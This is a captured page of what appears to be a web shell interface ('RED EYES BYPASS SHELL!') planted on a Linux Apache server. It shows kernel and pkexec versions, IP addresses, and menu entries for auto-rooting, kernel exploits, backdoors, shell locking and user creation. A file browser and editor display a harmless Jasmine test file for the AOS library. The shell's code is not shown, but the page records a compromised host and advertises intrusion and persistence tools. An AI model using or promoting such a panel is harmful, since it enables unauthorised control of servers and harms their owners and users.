Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
lifelonglearn /
work_181165 /
plugin /
aos /
test /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
fixtures
[ DIR ]
drwxr-xr-x
aos.spec.js
1.37
KB
-rwxr-xr-x
calculateOffset.spec.js
5.98
KB
-rwxr-xr-x
elements.spec.js
1.61
KB
-rwxr-xr-x
index.js
89
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aos.spec.js
import $ from 'jquery'; import AOS from '../src/js/aos'; jasmine.getStyleFixtures().fixturesPath = 'base/dist'; jasmine.getFixtures().fixturesPath = 'base/test/fixtures'; describe('AOS -> ', function() { beforeEach(function() { jasmine.getStyleFixtures().load = 'aos.css'; jasmine.getFixtures().load('aos.fixture.html'); }); afterEach(function() { jasmine.getStyleFixtures().cleanUp(); jasmine.getFixtures().cleanUp(); }); it('Should be defined', function() { expect(AOS).toBeDefined(); }); it('Should have init method', function() { expect(AOS.init).toBeDefined(); }); it('Should have refresh method', function() { expect(AOS.refresh).toBeDefined(); }); it('Should have same number of elements after init', function() { var elementsCount = $('.aos-item').length; var elements = AOS.init(); expect(elementsCount).toEqual(elements.length); }); it('Should have same number of elements after refresh', function() { var elementsCount = $('.aos-item').length; var elements = AOS.init(); elements = AOS.refresh(true); expect(elements.length).toEqual(elementsCount); }); it('Should add aos-init class on all elements', function() { var elementsCount = $('.aos-item').length; AOS.init(); var elementsWithClass = $('.aos-init'); expect(elementsCount).toEqual(elementsWithClass.length); }); });
Close